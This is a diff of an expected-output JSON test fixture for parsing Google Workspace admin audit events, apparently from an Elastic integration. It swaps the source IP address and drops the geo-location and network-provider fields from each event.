@@ -1782,35 +1422,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301266400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_LOCATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.004904600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_LOCATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_LOCATION", "id": "1", @@ -1847,7 +1469,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1871,35 +1493,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301268100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_ORGANIZATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.004909Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_ORGANIZATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_ORGANIZATION", "id": "1", @@ -1936,7 +1540,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1960,35 +1564,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301269800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_PHONE_NUMBER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.004942700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_PHONE_NUMBER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_PHONE_NUMBER", "id": "1", @@ -2025,7 +1611,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2049,35 +1635,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301271700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.004946700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "CHANGE_RECOVERY_EMAIL", "id": "1", @@ -2114,7 +1682,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2138,35 +1706,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301273400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.004951500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "CHANGE_RECOVERY_PHONE", "id": "1", @@ -2203,7 +1753,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2227,35 +1777,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301275100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_RELATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.004955300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_RELATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_RELATION", "id": "1", @@ -2292,7 +1824,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2316,35 +1848,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301277Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_ADDRESS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.004960300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_ADDRESS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_ADDRESS", "id": "1", @@ -2381,7 +1895,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2405,35 +1919,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301278700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_EMAIL_MONITOR\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"EMAIL_MONITOR_DEST_EMAIL\",\"value\":\"dest@example.com\"},{\"name\":\"EMAIL_MONITOR_LEVEL_CHAT\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_DRAFT_EMAIL\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_INCOMING_EMAIL\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_OUTGOING_EMAIL\",\"value\":\"info\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T16:00:00Z\"}]}}", + "ingested": "2021-12-09T13:38:57.004966200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_EMAIL_MONITOR\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"EMAIL_MONITOR_DEST_EMAIL\",\"value\":\"dest@example.com\"},{\"name\":\"EMAIL_MONITOR_LEVEL_CHAT\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_DRAFT_EMAIL\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_INCOMING_EMAIL\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_OUTGOING_EMAIL\",\"value\":\"info\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T16:00:00Z\"}]}}", "provider": "admin", "action": "CREATE_EMAIL_MONITOR", "id": "1", @@ -2470,7 +1966,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2494,35 +1990,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301280400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_DATA_TRANSFER_REQUEST\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DESTINATION_USER_EMAIL\",\"value\":\"dest@example.com\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"a,b,c\"}]}}", + "ingested": "2021-12-09T13:38:57.004972Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_DATA_TRANSFER_REQUEST\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DESTINATION_USER_EMAIL\",\"value\":\"dest@example.com\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"a,b,c\"}]}}", "provider": "admin", "action": "CREATE_DATA_TRANSFER_REQUEST", "id": "1", @@ -2559,7 +2037,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2583,35 +2061,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301282200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GRANT_DELEGATED_ADMIN_PRIVILEGES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:57.004977700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GRANT_DELEGATED_ADMIN_PRIVILEGES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "GRANT_DELEGATED_ADMIN_PRIVILEGES", "id": "1", @@ -2648,7 +2108,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2672,35 +2132,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301284Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_ACCOUNT_INFO_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"REQUEST_ID\",\"value\":\"id\"}]}}", + "ingested": "2021-12-09T13:38:57.004997400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_ACCOUNT_INFO_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"REQUEST_ID\",\"value\":\"id\"}]}}", "provider": "admin", "action": "DELETE_ACCOUNT_INFO_DUMP", "id": "1", @@ -2737,7 +2179,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2761,35 +2203,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301285700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_EMAIL_MONITOR\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"EMAIL_MONITOR_DEST_EMAIL\",\"value\":\"dest@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005003Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_EMAIL_MONITOR\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"EMAIL_MONITOR_DEST_EMAIL\",\"value\":\"dest@example.com\"}]}}", "provider": "admin", "action": "DELETE_EMAIL_MONITOR", "id": "1", @@ -2826,7 +2250,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2850,35 +2274,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301287400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_MAILBOX_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"REQUEST_ID\",\"value\":\"id\"}]}}", + "ingested": "2021-12-09T13:38:57.005008300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_MAILBOX_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"REQUEST_ID\",\"value\":\"id\"}]}}", "provider": "admin", "action": "DELETE_MAILBOX_DUMP", "id": "1", @@ -2915,7 +2321,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2939,35 +2345,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301289100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_FIRST_NAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.005013600Z", + "original": 